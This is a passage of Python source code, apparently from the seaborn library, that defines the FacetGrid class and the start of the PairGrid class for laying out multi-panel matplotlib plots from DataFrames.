def legend(self):
"""The :class:`matplotlib.legend.Legend` object, if present."""
try:
return self._legend
except AttributeError:
return None
_facet_docs = dict(
data=dedent("""\
data : DataFrame
Tidy ("long-form") dataframe where each column is a variable and each
row is an observation.\
"""),
rowcol=dedent("""\
row, col : vectors or keys in ``data``
Variables that define subsets to plot on different facets.\
"""),
rowcol_order=dedent("""\
{row,col}_order : vector of strings
Specify the order in which levels of the ``row`` and/or ``col`` variables
appear in the grid of subplots.\
"""),
col_wrap=dedent("""\
col_wrap : int
"Wrap" the column variable at this width, so that the column facets
span multiple rows. Incompatible with a ``row`` facet.\
"""),
share_xy=dedent("""\
share{x,y} : bool, 'col', or 'row' optional
If true, the facets will share y axes across columns and/or x axes
across rows.\
"""),
height=dedent("""\
height : scalar
Height (in inches) of each facet. See also: ``aspect``.\
"""),
aspect=dedent("""\
aspect : scalar
Aspect ratio of each facet, so that ``aspect * height`` gives the width
of each facet in inches.\
"""),
palette=dedent("""\
palette : palette name, list, or dict
Colors to use for the different levels of the ``hue`` variable. Should
be something that can be interpreted by :func:`color_palette`, or a
dictionary mapping hue levels to matplotlib colors.\
"""),
legend_out=dedent("""\
legend_out : bool
If ``True``, the figure size will be extended, and the legend will be
drawn outside the plot on the center right.\
"""),
margin_titles=dedent("""\
margin_titles : bool
If ``True``, the titles for the row variable are drawn to the right of
the last column. This option is experimental and may not work in all
cases.\
"""),
facet_kws=dedent("""\
facet_kws : dict
Additional parameters passed to :class:`FacetGrid`.
"""),
)
class FacetGrid(Grid):
"""Multi-plot grid for plotting conditional relationships."""
@_deprecate_positional_args
def __init__(
self, data, *,
row=None, col=None, hue=None, col_wrap=None,
sharex=True, sharey=True, height=3, aspect=1, palette=None,
row_order=None, col_order=None, hue_order=None, hue_kws=None,
dropna=False, legend_out=True, despine=True,
margin_titles=False, xlim=None, ylim=None, subplot_kws=None,
gridspec_kws=None, size=None
):
super(FacetGrid, self).__init__()
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
# Determine the hue facet layer information
hue_var = hue
if hue is None:
hue_names = None
else:
hue_names = categorical_order(data[hue], hue_order)
colors = self._get_palette(data, hue, hue_order, palette)
# Set up the lists of names for the row and column facet variables
if row is None:
row_names = []
else:
row_names = categorical_order(data[row], row_order)
if col is None:
col_names = []
else:
col_names = categorical_order(data[col], col_order)
# Additional dict of kwarg -> list of values for mapping the hue var
hue_kws = hue_kws if hue_kws is not None else {}
# Make a boolean mask that is True anywhere there is an NA
# value in one of the faceting variables, but only if dropna is True
none_na = np.zeros(len(data), bool)
if dropna:
row_na = none_na if row is None else data[row].isnull()
col_na = none_na if col is None else data[col].isnull()
hue_na = none_na if hue is None else data[hue].isnull()
not_na = ~(row_na | col_na | hue_na)
else:
not_na = ~none_na
# Compute the grid shape
ncol = 1 if col is None else len(col_names)
nrow = 1 if row is None else len(row_names)
self._n_facets = ncol * nrow
self._col_wrap = col_wrap
if col_wrap is not None:
if row is not None:
err = "Cannot use `row` and `col_wrap` together."
raise ValueError(err)
ncol = col_wrap
nrow = int(np.ceil(len(col_names) / col_wrap))
self._ncol = ncol
self._nrow = nrow
# Calculate the base figure size
# This can get stretched later by a legend
# TODO this doesn't account for axis labels
figsize = (ncol * height * aspect, nrow * height)
# Validate some inputs
if col_wrap is not None:
margin_titles = False
# Build the subplot keyword dictionary
subplot_kws = {} if subplot_kws is None else subplot_kws.copy()
gridspec_kws = {} if gridspec_kws is None else gridspec_kws.copy()
if xlim is not None:
subplot_kws["xlim"] = xlim
if ylim is not None:
subplot_kws["ylim"] = ylim
# --- Initialize the subplot grid
# Disable autolayout so legend_out works properly
with mpl.rc_context({"figure.autolayout": False}):
fig = plt.figure(figsize=figsize)
if col_wrap is None:
kwargs = dict(squeeze=False,
sharex=sharex, sharey=sharey,
subplot_kw=subplot_kws,
gridspec_kw=gridspec_kws)
axes = fig.subplots(nrow, ncol, **kwargs)
if col is None and row is None:
axes_dict = {}
elif col is None:
axes_dict = dict(zip(row_names, axes.flat))
elif row is None:
axes_dict = dict(zip(col_names, axes.flat))
else:
facet_product = product(row_names, col_names)
axes_dict = dict(zip(facet_product, axes.flat))
else:
# If wrapping the col variable we need to make the grid ourselves
if gridspec_kws:
warnings.warn("`gridspec_kws` ignored when using `col_wrap`")
n_axes = len(col_names)
axes = np.empty(n_axes, object)
axes[0] = fig.add_subplot(nrow, ncol, 1, **subplot_kws)
if sharex:
subplot_kws["sharex"] = axes[0]
if sharey:
subplot_kws["sharey"] = axes[0]
for i in range(1, n_axes):
axes[i] = fig.add_subplot(nrow, ncol, i + 1, **subplot_kws)
axes_dict = dict(zip(col_names, axes))
# --- Set up the class attributes
# Attributes that are part of the public API but accessed through
# a property so that Sphinx adds them to the auto class doc
self._figure = fig
self._axes = axes
self._axes_dict = axes_dict
self._legend = None
# Public attributes that aren't explicitly documented
# (It's not obvious that having them be public was a good idea)
self.data = data
self.row_names = row_names
self.col_names = col_names
self.hue_names = hue_names
self.hue_kws = hue_kws
# Next the private variables
self._nrow = nrow
self._row_var = row
self._ncol = ncol
self._col_var = col
self._margin_titles = margin_titles
self._margin_titles_texts = []
self._col_wrap = col_wrap
self._hue_var = hue_var
self._colors = colors
self._legend_out = legend_out
self._legend_data = {}
self._x_var = None
self._y_var = None
self._sharex = sharex
self._sharey = sharey
self._dropna = dropna
self._not_na = not_na
# --- Make the axes look good
self.set_titles()
self.tight_layout()
if despine:
self.despine()
if sharex in [True, 'col']:
for ax in self._not_bottom_axes:
for label in ax.get_xticklabels():
label.set_visible(False)
ax.xaxis.offsetText.set_visible(False)
ax.xaxis.label.set_visible(False)
if sharey in [True, 'row']:
for ax in self._not_left_axes:
for label in ax.get_yticklabels():
label.set_visible(False)
ax.yaxis.offsetText.set_visible(False)
ax.yaxis.label.set_visible(False)
__init__.__doc__ = dedent("""\
Initialize the matplotlib figure and FacetGrid object.
This class maps a dataset onto multiple axes arrayed in a grid of rows
and columns that correspond to *levels* of variables in the dataset.
The plots it produces are often called "lattice", "trellis", or
"small-multiple" graphics.
It can also represent levels of a third variable with the ``hue``
parameter, which plots different subsets of data in different colors.
This uses color to resolve elements on a third dimension, but only
draws subsets on top of each other and will not tailor the ``hue``
parameter for the specific visualization the way that axes-level
functions that accept ``hue`` will.
The basic workflow is to initialize the :class:`FacetGrid` object with
the dataset and the variables that are used to structure the grid. Then
one or more plotting functions can be applied to each subset by calling
:meth:`FacetGrid.map` or :meth:`FacetGrid.map_dataframe`. Finally, the
plot can be tweaked with other methods to do things like change the
axis labels, use different ticks, or add a legend. See the detailed
code examples below for more information.
.. warning::
When using seaborn functions that infer semantic mappings from a
dataset, care must be taken to synchronize those mappings across
facets (e.g., by defing the ``hue`` mapping with a palette dict or
setting the data type of the variables to ``category``). In most cases,
it will be better to use a figure-level function (e.g. :func:`relplot`
or :func:`catplot`) than to use :class:`FacetGrid` directly.
See the :ref:`tutorial <grid_tutorial>` for more information.
Parameters
----------
{data}
row, col, hue : strings
Variables that define subsets of the data, which will be drawn on
separate facets in the grid. See the ``{{var}}_order`` parameters to
control the order of levels of this variable.
{col_wrap}
{share_xy}
{height}
{aspect}
{palette}
{{row,col,hue}}_order : lists
Order for the levels of the faceting variables. By default, this
will be the order that the levels appear in ``data`` or, if the
variables are pandas categoricals, the category order.
hue_kws : dictionary of param -> list of values mapping
Other keyword arguments to insert into the plotting call to let
other plot attributes vary across levels of the hue variable (e.g.
the markers in a scatterplot).
{legend_out}
despine : boolean
Remove the top and right spines from the plots.
{margin_titles}
{{x, y}}lim: tuples
Limits for each of the axes on each facet (only relevant when
share{{x, y}} is True).
subplot_kws : dict
Dictionary of keyword arguments passed to matplotlib subplot(s)
methods.
gridspec_kws : dict
Dictionary of keyword arguments passed to
:class:`matplotlib.gridspec.GridSpec`
(via :meth:`matplotlib.figure.Figure.subplots`).
Ignored if ``col_wrap`` is not ``None``.
See Also
--------
PairGrid : Subplot grid for plotting pairwise relationships
relplot : Combine a relational plot and a :class:`FacetGrid`
displot : Combine a distribution plot and a :class:`FacetGrid`
catplot : Combine a categorical plot and a :class:`FacetGrid`
lmplot : Combine a regression plot and a :class:`FacetGrid`
Examples
--------
.. note::
These examples use seaborn functions to demonstrate some of the
advanced features of the class, but in most cases you will want
to use figue-level functions (e.g. :func:`displot`, :func:`relplot`)
to make the plots shown here.
.. include:: ../docstrings/FacetGrid.rst
""").format(**_facet_docs)
def facet_data(self):
"""Generator for name indices and data subsets for each facet.
Yields
------
(i, j, k), data_ijk : tuple of ints, DataFrame
The ints provide an index into the {row, col, hue}_names attribute,
and the dataframe contains a subset of the full data corresponding
to each facet. The generator yields subsets that correspond with
the self.axes.flat iterator, or self.axes[i, j] when `col_wrap`
is None.
"""
data = self.data
# Construct masks for the row variable
if self.row_names:
row_masks = [data[self._row_var] == n for n in self.row_names]
else:
row_masks = [np.repeat(True, len(self.data))]
# Construct masks for the column variable
if self.col_names:
col_masks = [data[self._col_var] == n for n in self.col_names]
else:
col_masks = [np.repeat(True, len(self.data))]
# Construct masks for the hue variable
if self.hue_names:
hue_masks = [data[self._hue_var] == n for n in self.hue_names]
else:
hue_masks = [np.repeat(True, len(self.data))]
# Here is the main generator loop
for (i, row), (j, col), (k, hue) in product(enumerate(row_masks),
enumerate(col_masks),
enumerate(hue_masks)):
data_ijk = data[row & col & hue & self._not_na]
yield (i, j, k), data_ijk
def map(self, func, *args, **kwargs):
"""Apply a plotting function to each facet's subset of the data.
Parameters
----------
func : callable
A plotting function that takes data and keyword arguments. It
must plot to the currently active matplotlib Axes and take a
`color` keyword argument. If faceting on the `hue` dimension,
it must also take a `label` keyword argument.
args : strings
Column names in self.data that identify variables with data to
plot. The data for each variable is passed to `func` in the
order the variables are specified in the call.
kwargs : keyword arguments
All keyword arguments are passed to the plotting function.
Returns
-------
self : object
Returns self.
"""
# If color was a keyword argument, grab it here
kw_color = kwargs.pop("color", None)
# How we use the function depends on where it comes from
func_module = str(getattr(func, "__module__", ""))
# Check for categorical plots without order information
if func_module == "seaborn.categorical":
if "order" not in kwargs:
warning = ("Using the {} function without specifying "
"`order` is likely to produce an incorrect "
"plot.".format(func.__name__))
warnings.warn(warning)
if len(args) == 3 and "hue_order" not in kwargs:
warning = ("Using the {} function without specifying "
"`hue_order` is likely to produce an incorrect "
"plot.".format(func.__name__))
warnings.warn(warning)
# Iterate over the data subsets
for (row_i, col_j, hue_k), data_ijk in self.facet_data():
# If this subset is null, move on
if not data_ijk.values.size:
continue
# Get the current axis
modify_state = not func_module.startswith("seaborn")
ax = self.facet_axis(row_i, col_j, modify_state)
# Decide what color to plot with
kwargs["color"] = self._facet_color(hue_k, kw_color)
# Insert the other hue aesthetics if appropriate
for kw, val_list in self.hue_kws.items():
kwargs[kw] = val_list[hue_k]
# Insert a label in the keyword arguments for the legend
if self._hue_var is not None:
kwargs["label"] = utils.to_utf8(self.hue_names[hue_k])
# Get the actual data we are going to plot with
plot_data = data_ijk[list(args)]
if self._dropna:
plot_data = plot_data.dropna()
plot_args = [v for k, v in plot_data.iteritems()]
# Some matplotlib functions don't handle pandas objects correctly
if func_module.startswith("matplotlib"):
plot_args = [v.values for v in plot_args]
# Draw the plot
self._facet_plot(func, ax, plot_args, kwargs)
# Finalize the annotations and layout
self._finalize_grid(args[:2])
return self
def map_dataframe(self, func, *args, **kwargs):
"""Like ``.map`` but passes args as strings and inserts data in kwargs.
This method is suitable for plotting with functions that accept a
long-form DataFrame as a `data` keyword argument and access the
data in that DataFrame using string variable names.
Parameters
----------
func : callable
A plotting function that takes data and keyword arguments. Unlike
the `map` method, a function used here must "understand" Pandas
objects. It also must plot to the currently active matplotlib Axes
and take a `color` keyword argument. If faceting on the `hue`
dimension, it must also take a `label` keyword argument.
args : strings
Column names in self.data that identify variables with data to
plot. The data for each variable is passed to `func` in the
order the variables are specified in the call.
kwargs : keyword arguments
All keyword arguments are passed to the plotting function.
Returns
-------
self : object
Returns self.
"""
# If color was a keyword argument, grab it here
kw_color = kwargs.pop("color", None)
# Iterate over the data subsets
for (row_i, col_j, hue_k), data_ijk in self.facet_data():
# If this subset is null, move on
if not data_ijk.values.size:
continue
# Get the current axis
modify_state = not str(func.__module__).startswith("seaborn")
ax = self.facet_axis(row_i, col_j, modify_state)
# Decide what color to plot with
kwargs["color"] = self._facet_color(hue_k, kw_color)
# Insert the other hue aesthetics if appropriate
for kw, val_list in self.hue_kws.items():
kwargs[kw] = val_list[hue_k]
# Insert a label in the keyword arguments for the legend
if self._hue_var is not None:
kwargs["label"] = self.hue_names[hue_k]
# Stick the facet dataframe into the kwargs
if self._dropna:
data_ijk = data_ijk.dropna()
kwargs["data"] = data_ijk
# Draw the plot
self._facet_plot(func, ax, args, kwargs)
# For axis labels, prefer to use positional args for backcompat
# but also extract the x/y kwargs and use if no corresponding arg
axis_labels = [kwargs.get("x", None), kwargs.get("y", None)]
for i, val in enumerate(args[:2]):
axis_labels[i] = val
self._finalize_grid(axis_labels)
return self
def _facet_color(self, hue_index, kw_color):
color = self._colors[hue_index]
if kw_color is not None:
return kw_color
elif color is not None:
return color
def _facet_plot(self, func, ax, plot_args, plot_kwargs):
# Draw the plot
if str(func.__module__).startswith("seaborn"):
plot_kwargs = plot_kwargs.copy()
semantics = ["x", "y", "hue", "size", "style"]
for key, val in zip(semantics, plot_args):
plot_kwargs[key] = val
plot_args = []
plot_kwargs["ax"] = ax
func(*plot_args, **plot_kwargs)
# Sort out the supporting information
self._update_legend_data(ax)
def _finalize_grid(self, axlabels):
"""Finalize the annotations and layout."""
self.set_axis_labels(*axlabels)
self.tight_layout()
def facet_axis(self, row_i, col_j, modify_state=True):
"""Make the axis identified by these indices active and return it."""
# Calculate the actual indices of the axes to plot on
if self._col_wrap is not None:
ax = self.axes.flat[col_j]
else:
ax = self.axes[row_i, col_j]
# Get a reference to the axes object we want, and make it active
if modify_state:
plt.sca(ax)
return ax
def despine(self, **kwargs):
"""Remove axis spines from the facets."""
utils.despine(self._figure, **kwargs)
return self
def set_axis_labels(self, x_var=None, y_var=None, clear_inner=True, **kwargs):
"""Set axis labels on the left column and bottom row of the grid."""
if x_var is not None:
self._x_var = x_var
self.set_xlabels(x_var, clear_inner=clear_inner, **kwargs)
if y_var is not None:
self._y_var = y_var
self.set_ylabels(y_var, clear_inner=clear_inner, **kwargs)
return self
def set_xlabels(self, label=None, clear_inner=True, **kwargs):
"""Label the x axis on the bottom row of the grid."""
if label is None:
label = self._x_var
for ax in self._bottom_axes:
ax.set_xlabel(label, **kwargs)
if clear_inner:
for ax in self._not_bottom_axes:
ax.set_xlabel("")
return self
def set_ylabels(self, label=None, clear_inner=True, **kwargs):
"""Label the y axis on the left column of the grid."""
if label is None:
label = self._y_var
for ax in self._left_axes:
ax.set_ylabel(label, **kwargs)
if clear_inner:
for ax in self._not_left_axes:
ax.set_ylabel("")
return self
def set_xticklabels(self, labels=None, step=None, **kwargs):
"""Set x axis tick labels of the grid."""
for ax in self.axes.flat:
curr_ticks = ax.get_xticks()
ax.set_xticks(curr_ticks)
if labels is None:
curr_labels = [l.get_text() for l in ax.get_xticklabels()]
if step is not None:
xticks = ax.get_xticks()[::step]
curr_labels = curr_labels[::step]
ax.set_xticks(xticks)
ax.set_xticklabels(curr_labels, **kwargs)
else:
ax.set_xticklabels(labels, **kwargs)
return self
def set_yticklabels(self, labels=None, **kwargs):
"""Set y axis tick labels on the left column of the grid."""
for ax in self.axes.flat:
curr_ticks = ax.get_yticks()
ax.set_yticks(curr_ticks)
if labels is None:
curr_labels = [l.get_text() for l in ax.get_yticklabels()]
ax.set_yticklabels(curr_labels, **kwargs)
else:
ax.set_yticklabels(labels, **kwargs)
return self
def set_titles(self, template=None, row_template=None, col_template=None,
**kwargs):
"""Draw titles either above each facet or on the grid margins.
Parameters
----------
template : string
Template for all titles with the formatting keys {col_var} and
{col_name} (if using a `col` faceting variable) and/or {row_var}
and {row_name} (if using a `row` faceting variable).
row_template:
Template for the row variable when titles are drawn on the grid
margins. Must have {row_var} and {row_name} formatting keys.
col_template:
Template for the row variable when titles are drawn on the grid
margins. Must have {col_var} and {col_name} formatting keys.
Returns
-------
self: object
Returns self.
"""
args = dict(row_var=self._row_var, col_var=self._col_var)
kwargs["size"] = kwargs.pop("size", mpl.rcParams["axes.labelsize"])
# Establish default templates
if row_template is None:
row_template = "{row_var} = {row_name}"
if col_template is None:
col_template = "{col_var} = {col_name}"
if template is None:
if self._row_var is None:
template = col_template
elif self._col_var is None:
template = row_template
else:
template = " | ".join([row_template, col_template])
row_template = utils.to_utf8(row_template)
col_template = utils.to_utf8(col_template)
template = utils.to_utf8(template)
if self._margin_titles:
# Remove any existing title texts
for text in self._margin_titles_texts:
text.remove()
self._margin_titles_texts = []
if self.row_names is not None:
# Draw the row titles on the right edge of the grid
for i, row_name in enumerate(self.row_names):
ax = self.axes[i, -1]
args.update(dict(row_name=row_name))
title = row_template.format(**args)
text = ax.annotate(
title, xy=(1.02, .5), xycoords="axes fraction",
rotation=270, ha="left", va="center",
**kwargs
)
self._margin_titles_texts.append(text)
if self.col_names is not None:
# Draw the column titles as normal titles
for j, col_name in enumerate(self.col_names):
args.update(dict(col_name=col_name))
title = col_template.format(**args)
self.axes[0, j].set_title(title, **kwargs)
return self
# Otherwise title each facet with all the necessary information
if (self._row_var is not None) and (self._col_var is not None):
for i, row_name in enumerate(self.row_names):
for j, col_name in enumerate(self.col_names):
args.update(dict(row_name=row_name, col_name=col_name))
title = template.format(**args)
self.axes[i, j].set_title(title, **kwargs)
elif self.row_names is not None and len(self.row_names):
for i, row_name in enumerate(self.row_names):
args.update(dict(row_name=row_name))
title = template.format(**args)
self.axes[i, 0].set_title(title, **kwargs)
elif self.col_names is not None and len(self.col_names):
for i, col_name in enumerate(self.col_names):
args.update(dict(col_name=col_name))
title = template.format(**args)
# Index the flat array so col_wrap works
self.axes.flat[i].set_title(title, **kwargs)
return self
def refline(self, *, x=None, y=None, color='.5', linestyle='--', **line_kws):
"""Add a reference line(s) to each facet.
Parameters
----------
x, y : numeric
Value(s) to draw the line(s) at.
color : :mod:`matplotlib color <matplotlib.colors>`
Specifies the color of the reference line(s). Pass ``color=None`` to
use ``hue`` mapping.
linestyle : str
Specifies the style of the reference line(s).
line_kws : key, value mappings
Other keyword arguments are passed to :meth:`matplotlib.axes.Axes.axvline`
when ``x`` is not None and :meth:`matplotlib.axes.Axes.axhline` when ``y``
is not None.
Returns
-------
:class:`FacetGrid` instance
Returns ``self`` for easy method chaining.
"""
line_kws['color'] = color
line_kws['linestyle'] = linestyle
if x is not None:
self.map(plt.axvline, x=x, **line_kws)
if y is not None:
self.map(plt.axhline, y=y, **line_kws)
# ------ Properties that are part of the public API and documented by Sphinx
@property
def axes(self):
"""An array of the :class:`matplotlib.axes.Axes` objects in the grid."""
return self._axes
@property
def ax(self):
"""The :class:`matplotlib.axes.Axes` when no faceting variables are assigned."""
if self.axes.shape == (1, 1):
return self.axes[0, 0]
else:
err = (
"Use the `.axes` attribute when facet variables are assigned."
)
raise AttributeError(err)
@property
def axes_dict(self):
"""A mapping of facet names to corresponding :class:`matplotlib.axes.Axes`.
If only one of ``row`` or ``col`` is assigned, each key is a string
representing a level of that variable. If both facet dimensions are
assigned, each key is a ``({row_level}, {col_level})`` tuple.
"""
return self._axes_dict
# ------ Private properties, that require some computation to get
@property
def _inner_axes(self):
"""Return a flat array of the inner axes."""
if self._col_wrap is None:
return self.axes[:-1, 1:].flat
else:
axes = []
n_empty = self._nrow * self._ncol - self._n_facets
for i, ax in enumerate(self.axes):
append = (
i % self._ncol
and i < (self._ncol * (self._nrow - 1))
and i < (self._ncol * (self._nrow - 1) - n_empty)
)
if append:
axes.append(ax)
return np.array(axes, object).flat
@property
def _left_axes(self):
"""Return a flat array of the left column of axes."""
if self._col_wrap is None:
return self.axes[:, 0].flat
else:
axes = []
for i, ax in enumerate(self.axes):
if not i % self._ncol:
axes.append(ax)
return np.array(axes, object).flat
@property
def _not_left_axes(self):
"""Return a flat array of axes that aren't on the left column."""
if self._col_wrap is None:
return self.axes[:, 1:].flat
else:
axes = []
for i, ax in enumerate(self.axes):
if i % self._ncol:
axes.append(ax)
return np.array(axes, object).flat
@property
def _bottom_axes(self):
"""Return a flat array of the bottom row of axes."""
if self._col_wrap is None:
return self.axes[-1, :].flat
else:
axes = []
n_empty = self._nrow * self._ncol - self._n_facets
for i, ax in enumerate(self.axes):
append = (
i >= (self._ncol * (self._nrow - 1))
or i >= (self._ncol * (self._nrow - 1) - n_empty)
)
if append:
axes.append(ax)
return np.array(axes, object).flat
@property
def _not_bottom_axes(self):
"""Return a flat array of axes that aren't on the bottom row."""
if self._col_wrap is None:
return self.axes[:-1, :].flat
else:
axes = []
n_empty = self._nrow * self._ncol - self._n_facets
for i, ax in enumerate(self.axes):
append = (
i < (self._ncol * (self._nrow - 1))
and i < (self._ncol * (self._nrow - 1) - n_empty)
)
if append:
axes.append(ax)
return np.array(axes, object).flat
class PairGrid(Grid):
"""Subplot grid for plotting pairwise relationships in a dataset.
This object maps each variable in a dataset onto a column and row in a
grid of multiple axes. Different axes-level plotting functions can be
used to draw bivariate plots in the upper and lower triangles, and the
the marginal distribution of each variable can be shown on the diagonal.
Several different common plots can be generated in a single line using
:func:`pairplot`. Use :class:`PairGrid` when you need more flexibility.
See the :ref:`tutorial <grid_tutorial>` for more information.
"""
@_deprecate_positional_args
def __init__(
self, data, *,
hue=None, hue_order=None, palette=None,
hue_kws=None, vars=None, x_vars=None, y_vars=None,
corner=False, diag_sharey=True, height=2.5, aspect=1,
layout_pad=.5, despine=True, dropna=False, size=None
):
"""Initialize the plot figure and PairGrid object.
Parameters
----------
data : DataFrame
Tidy (long-form) dataframe where each column is a variable and
each row is an observation.
hue : string (variable name)
Variable in ``data`` to map plot aspects to different colors. This
variable will be excluded from the default x and y variables.
hue_order : list of strings
Order for the levels of the hue variable in the palette
palette : dict or seaborn color palette
Set of colors for mapping the ``hue`` variable. If a dict, keys
should be values in the ``hue`` variable.
hue_kws : dictionary of param -> list of values mapping
Other keyword arguments to insert into the plotting call to let
other plot attributes vary across levels of the hue variable (e.g.
the markers in a scatterplot).
vars : list of variable names
Variables within ``data`` to use, otherwise use every column with
a numeric datatype.
{x, y}_vars : lists of variable names
Variables within ``data`` to use separately for the rows and
columns of the figure; i.e. to make a non-square plot.
corner : bool
If True, don't add axes to the upper (off-diagonal) triangle of the
grid, making this a "corner" plot.
height : scalar
Height (in inches) of each facet.
aspect : scalar
Aspect * height gives the width (in inches) of each facet.
layout_pad : scalar
Padding between axes; passed to ``fig.tight_layout``.
despine : boolean
Remove the top and right spines from the plots.
dropna : boolean
Drop missing values from the data before plotting.
See Also
--------
pairplot : Easily drawing common uses of :class:`PairGrid`.
FacetGrid : Subplot grid for plotting conditional relationships.
Examples
--------
.. include:: ../docstrings/PairGrid.rst
"""
super(PairGrid, self).__init__()
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(UserWarning(msg))
# Sort out the variables that define the grid
numeric_cols = self._find_numeric_cols(data)
if hue in numeric_cols:
numeric_cols.remove(hue)
if vars is not None:
x_vars = list(vars)
y_vars = list(vars)
if x_vars is None:
x_vars = numeric_cols
if y_vars is None:
y_vars = numeric_cols
if np.isscalar(x_vars):
x_vars = [x_vars]
if np.isscalar(y_vars):
y_vars = [y_vars]
self.x_vars = x_vars = list(x_vars)
self.y_vars = y_vars = list(y_vars)
self.square_grid = self.x_vars == self.y_vars
if not x_vars:
raise ValueError("No variables found for grid columns.")
if not y_vars:
raise ValueError("No variables found for grid rows.")
# Create the figure and the array of subplots
figsize = len(x_vars) * height * aspect, len(y_vars) * height
# Disable autolayout so legend_out works
with mpl.rc_context({"figure.autolayout": False}):
fig = plt.figure(figsize=figsize)
axes = fig.subplots(len(y_vars), len(x_vars),
sharex="col", sharey="row",
squeeze=False)
# Possibly remove upper axes to make a corner grid
# Note: setting up the axes is usually the most time-intensive part
# of using the PairGrid. We are foregoing the speed improvement that
# we would get by just not setting up the hidden axes so that we can
# avoid implementing fig.subplots ourselves. But worth thinking about.
self._corner = corner
if corner:
hide_indices = np.triu_indices_from(axes, 1)
for i, j in zip(*hide_indices):
axes[i, j].remove()
axes[i, j] = None
self._figure = fig
self.axes = axes
self.data = data
# Save what we are going to do with the diagonal
self.diag_sharey = diag_sharey
self.diag_vars = None
self.diag_axes = None
self._dropna = dropna
# Label the axes
self._add_axis_labels()
# Sort out the hue variable
self._hue_var = hue
if hue is None:
self.hue_names = hue_order = ["_nolegend_"]
self.hue_vals = pd.Series(["_nolegend_"] * len(data),
index=data.index)
else:
# We need hue_order and hue_names because the former is used to control
# the order of drawing and the latter is used to control the order of
# the legend. hue_names can become string-typed while hue_order must
# retain the type of the input data. This is messy but results from
# the fact that PairGrid can implement the hue-mapping logic itself
# (and was originally written exclusively that way) but now can delegate
# to the axes-level functions, while always handling legend creation.
# See GH2307
hue_names = hue_order = categorical_order(data[hue], hue_order)
if dropna:
# Filter NA from the list of unique hue names
hue_names = list(filter(pd.notnull, hue_names))
self.hue_names = hue_names
self.hue_vals = data[hue]
# Additional dict of kwarg -> list of values for mapping the hue var
self.hue_kws = hue_kws if hue_kws is not None else {}
self._orig_palette = palette
self._hue_order = hue_order
self.palette = self._get_palette(data, hue, hue_order, palette)
self._legend_data = {}
# Make the plot look nice
for ax in axes[:-1, :].flat:
if ax is None:
continue
for label in ax.get_xticklabels():
label.set_visible(False)
ax.xaxis.offsetText.set_visible(False)
ax.xaxis.label.set_visible(False)
for ax in axes[:, 1:].flat:
if ax is None:
continue
for label in ax.get_yticklabels():
label.set_visible(False)
ax.yaxis.offsetText.set_visible(False)
ax.yaxis.label.set_visible(False)
self._tight_layout_rect = [.01, .01, .99, .99]
self._tight_layout_pad = layout_pad
self._despine = despine
if despine:
utils.despine(fig=fig)
self.tight_layout(pad=layout_pad)
def map(self, func, **kwargs):
"""Plot with the same function in every subplot.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
row_indices, col_indices = np.indices(self.axes.shape)
indices = zip(row_indices.flat, col_indices.flat)
self._map_bivariate(func, indices, **kwargs)
return self
def map_lower(self, func, **kwargs):
"""Plot with a bivariate function on the lower diagonal subplots.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
indices = zip(*np.tril_indices_from(self.axes, -1))
self._map_bivariate(func, indices, **kwargs)
return self
def map_upper(self, func, **kwargs):
"""Plot with a bivariate function on the upper diagonal subplots.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
indices = zip(*np.triu_indices_from(self.axes, 1))
self._map_bivariate(func, indices, **kwargs)
return self
def map_offdiag(self, func, **kwargs):
"""Plot with a bivariate function on the off-diagonal subplots.
Parameters
----------
func : callable plotting function
Must take x, y arrays as positional arguments and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
if self.square_grid:
self.map_lower(func, **kwargs)
if not self._corner:
self.map_upper(func, **kwargs)
else:
indices = []
for i, (y_var) in enumerate(self.y_vars):
for j, (x_var) in enumerate(self.x_vars):
if x_var != y_var:
indices.append((i, j))
self._map_bivariate(func, indices, **kwargs)
return self
def map_diag(self, func, **kwargs):
"""Plot with a univariate function on each diagonal subplot.
Parameters
----------
func : callable plotting function
Must take an x array as a positional argument and draw onto the
"currently active" matplotlib Axes. Also needs to accept kwargs
called ``color`` and ``label``.
"""
# Add special diagonal axes for the univariate plot
if self.diag_axes is None:
diag_vars = []
diag_axes = []
for i, y_var in enumerate(self.y_vars):
for j, x_var in enumerate(self.x_vars):
if x_var == y_var:
# Make the density axes
diag_vars.append(x_var)
ax = self.axes[i, j]
diag_ax = ax.twinx()
diag_ax.set_axis_off()
diag_axes.append(diag_ax)
# Work around matplotlib bug
# https://github.com/matplotlib/matplotlib/issues/15188
if not plt.rcParams.get("ytick.left", True):
for tick in ax.yaxis.majorTicks:
tick.tick1line.set_visible(False)
# Remove main y axis from density axes in a corner plot
if self._corner:
ax.yaxis.set_visible(False)
if self._despine:
utils.despine(ax=ax, left=True)
# TODO add optional density ticks (on the right)
# when drawing a corner plot?
if self.diag_sharey and diag_axes:
# This may change in future matplotlibs
# See https://github.com/matplotlib/matplotlib/pull/9923
group = diag_axes[0].get_shared_y_axes()
for ax in diag_axes[1:]:
group.join(ax, diag_axes[0])
self.diag_vars = np.array(diag_vars, np.object_)
self.diag_axes = np.array(diag_axes, np.object_)
if "hue" not in signature(func).parameters:
return self._map_diag_iter_hue(func, **kwargs)
# Loop over diagonal variables and axes, making one plot in each
for var, ax in zip(self.diag_vars, self.diag_axes):
plot_kwargs = kwargs.copy()
if str(func.__module__).startswith("seaborn"):
plot_kwargs["ax"] = ax
else:
plt.sca(ax)
vector = self.data[var]
if self._hue_var is not None:
hue = self.data[self._hue_var]
else:
hue = None
if self._dropna:
not_na = vector.notna()
if hue is not None:
not_na &= hue.notna()
vector = vector[not_na]
if hue is not None:
hue = hue[not_na]
plot_kwargs.setdefault("hue", hue)
plot_kwargs.setdefault("hue_order", self._hue_order)
plot_kwargs.setdefault("palette", self._orig_palette)
func(x=vector, **plot_kwargs)
ax.legend_ = None
self._add_axis_labels()
return self
def _map_diag_iter_hue(self, func, **kwargs):
"""Put marginal plot on each diagonal axes, iterating over hue."""
# Plot on each of the diagonal axes
